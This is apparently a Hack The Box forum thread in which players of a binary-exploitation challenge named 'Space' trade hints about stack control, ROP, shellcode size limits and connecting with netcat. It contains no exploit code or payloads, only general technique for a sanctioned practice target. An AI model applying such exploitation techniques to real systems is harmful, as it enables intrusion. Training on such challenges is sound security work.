SPACE [PWN]

A New PWN Challenge!

Ja4V8s28Ck
Nothing is an Accident, It's Just a part of Destiny

«1

Comments

  • This is a nice challenge, somewhat similar to ropmev2 it replaced.

    joeblogg801

  • can i pm someone for a nudge?

    m4nu

    Valiant, nothing is impossible.
    Lock by lock and one after the other is the key. You cannot open door number 9 until you have unlocked number 8.

  • Simple, but interesting...

  • SImple challenge :smile:

  • Hi, I'm stuck and need a little push in the right direction.

    I can redirect the IP to point on the stack but there's not that much 'space'... Any hint would be great.

  • You can send me a PM r4gus! I just completed this challenge and I would't consider my solution as simple, so maybe there is an easier way... but I'm quite new to this, so maybe my judgment of what is easy or not is a bit off... Really enjoyed it though!

    ArtemisFY
    OSCP

  • It's actually not hard tbh

  • @ano12 Can I send you my solution a PM, to check whether mine solution is the intended way?

    ArtemisFY
    OSCP

  • does anybody try to get root after getting in?

  • edited July 2020

    Spoiler removed

  • Would anyone be up for a PM so I can bat some ideas against them? I think I know where to go with this one, but am stuck.

    alt text

  • Yes, you can send me a PM @whipped!

    ArtemisFY
    OSCP

  • edited July 2020

    I have a couple of techniques that work against the local binary, but nothing works against the remote server, can't leak anything! Only seg faults remotely, but leaks locally.

    Update: Solved it. It helps to put in the correct PLT addresses in your code. Had the solution days ago, but this simple typo wasted 5 days of debugging...

  • Was anyone able to do this without ropping? Seems it should be doable from looking at the mitigations on the binary

  • Type your comment> @Rembown said:

    Was anyone able to do this without ropping? Seems it should be doable from looking at the mitigations on the binary

    Yes, the intended way was without using rop.

    R4J

  • edited July 2020

    Done with ROP..

    Hack The Box

    Write ups FR : https://hackingdom.io/

  • edited July 2020

    So, I'm new to this and I'm trying to connect to the instance via the docker site but i'm not able to. I've tried docker.hackthebox.eu:(port here) but it doesn't work like the web instance challenges. Tried http:// and https:// with no luck either. I've checked to make sure it isn't being blocked but don't really think i'm able to even start on this one since I can't get to the instance. Any help is appreciated.

  • Type your comment> @Ranger32 said:

    So, I'm new to this and I'm trying to connect to the instance via the docker site but i'm not able to. I've tried docker.hackthebox.eu:(port here) but it doesn't work like the web instance challenges. Tried http:// and https:// with no luck either. I've checked to make sure it isn't being blocked but don't really think i'm able to even start on this one since I can't get to the instance. Any help is appreciated.

    This is a binary exploitation challenge. You're not going to be able to exploit it using a browser... Try researching methods of remote binary exploitation by connecting to the remote instance with netcat (or nc).

    If you are trying to connect to this challenge with a browser, you are likely misinterpreting the meaning of a "pwn" challenge. Best of luck!


    Hack The Box
    defarbs.com | Retired Machine Writeups! - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • Can anyone please point me in the right direction? I am having problem in getting a leak.

  • For those who are trying to leak an address, there is no need to do so. Have a look at the binary protections ;-). There is a well-known technique that can be used here to jump to a certain address. For those who, even so, still have troubles with the total bytes available to write a working shellcode, think that you can almost "split" the thing more or less in two halves.

    Cheers, good luck.

    Sociaslkas

  • You can connect to it using netcat.

    The command is

    "Nc
    n> @socialkas said:

    For those who are trying to leak an address, there is no need to do so. Have a look at the binary protections ;-). There is a well-known technique that can be used here to jump to a certain address. For those who, even so, still have troubles with the total bytes available to write a working shellcode, think that you can almost "split" the thing more or less in two halves.

    Cheers, good luck.

    This can become much more complicated. ;) There's another way if you know what to do. I'd say go with easier side to this.

  • Type your comment> @ano12 said:

    You can connect to it using netcat.

    The command is

    "Nc
    n> @socialkas said:

    For those who are trying to leak an address, there is no need to do so. Have a look at the binary protections ;-). There is a well-known technique that can be used here to jump to a certain address. For those who, even so, still have troubles with the total bytes available to write a working shellcode, think that you can almost "split" the thing more or less in two halves.

    Cheers, good luck.

    This can become much more complicated. ;) There's another way if you know what to do. I'd say go with easier side to this.

    But my way is way more fun :)

    Sociaslkas

  • Type your comment> @socialkas said:

    Type your comment> @ano12 said:

    You can connect to it using netcat.

    The command is

    "Nc
    n> @socialkas said:

    For those who are trying to leak an address, there is no need to do so. Have a look at the binary protections ;-). There is a well-known technique that can be used here to jump to a certain address. For those who, even so, still have troubles with the total bytes available to write a working shellcode, think that you can almost "split" the thing more or less in two halves.

    Cheers, good luck.

    This can become much more complicated. ;) There's another way if you know what to do. I'd say go with easier side to this.

    But my way is way more fun :)

    huh? what do you mean by more fun, a solve is a solve. Spltting the shellcode is just way overkill.

  • Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens...

  • edited August 2020

    @Chainmanner said:

    Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens...

    There is multiple ways to solve this one, you need to explain more on what you have done.
    It can be the execution env for example, or something else.

    'These violent delights have violent ends'

  • Type your comment> @Chainmanner said:

    Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens...

    This mainly happens due to some type of stack misalignment error. At least what I have face in the past. But nothing much can be said without looking at the payload that you're sending.

  • hi i'm stuck. I can rewrite $eip to any value, but it doesn't give much result.
    I can't use ret2leb, because I don't know the "libc" address.
    maybe i should focus on plt and got sections. I need a hint.
    tell me what strategy should i follow?
    or write to me in HP with a more detailed explanation.

    thank you in advance!

  • hi i'm currently stuck. I do have kind of control of eip what the various things i tried do either only work locally or dont work at all. could someone please give me a hint on how to proceed or pm me for more details.
    thx

    zaphoxx

  • Not "Very easy" but fun :)

Sign In to comment.